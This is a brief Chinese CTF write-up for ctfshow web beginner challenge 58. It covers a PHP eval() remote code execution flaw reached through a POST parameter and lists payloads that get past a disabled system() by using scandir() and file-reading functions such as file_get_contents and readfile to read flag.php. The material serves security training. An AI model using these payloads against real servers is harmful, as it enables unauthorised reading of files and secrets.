ctf show web入门58

这是一道远程代码执行漏洞,我们先查看源代码

发现这里是使用POST方式传参给$c,再通过eval()函数来执行输入的内容

我们可以打开hackbar来进行POST提交

这里提示我们system()函数被禁用了,我们尝试其他命令

我们可以用 scandir() 函数来读取目录,并用 print_r() 或 var_dump() 打印出来

发现有一个flag.php我们尝试查看该目录中的内容

c=echo file_get_contents('flag.php');

c=highlight_file('flag.php');

c=readfile('flag.php');

c=show_source('flag.php');

相关推荐
zzx2006__1 小时前
JavaScript最终考核
开发语言·前端·javascript
用户4445543654261 小时前
Android跑马灯控件
前端
光影少年1 小时前
react全局状态、局部状态、服务端状态如何选型
前端·react.js·掘金·金石计划
甄心爱学习1 小时前
【项目实训(个人10)】
开发语言·前端·javascript
7yue2 小时前
我用 AI 把 Learn Claude Code 改写成了 TypeScript + 代数效应版本
前端
云宝大王2 小时前
JavaScript 异步编程:从回调到探索 Promise的秘密
前端·javascript
daols882 小时前
vxe-table 进阶:同时使用 formatter 与 cell-render 实现格式化与样式定制
前端·javascript·vue.js·vxe-table
用户059540174462 小时前
用LangChain+FastAPI构建私有知识库踩坑实录:这3个问题让我排查了整整8小时
前端·css
Momo__2 小时前
CSS View Transitions 新语法:sibling-index() + ident(),千级元素命名难题的终局方案
前端·css